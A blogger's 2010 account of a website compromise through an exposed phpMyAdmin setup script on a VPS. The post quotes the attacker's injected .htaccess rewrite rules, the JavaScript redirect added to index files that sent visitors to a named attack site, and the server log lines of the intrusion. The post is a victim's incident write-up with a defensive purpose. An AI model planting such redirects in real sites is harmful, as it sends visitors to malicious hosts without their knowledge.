I've been hacked!
Today – at 4:26pm (server time) my site was hacked.
All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)
After trying to figure out how hey got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin. They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN. There. I feel a bit better.
Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups. Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).
I really can't believe that the installation script was left after the system admins made the image for my VPS. Really dumb. As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed. I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating.
The final attacked updated all .htaccess files to include:
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php
And they inserted the following in the base of the index.php and index.html files for each folder:
<script>document.location.href='http://webarh.com/z.php';</script>
The log files show a single GET and then POST to the file:
174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 – "-" "-"
That's it. That's the hacker. The host manager has been notified.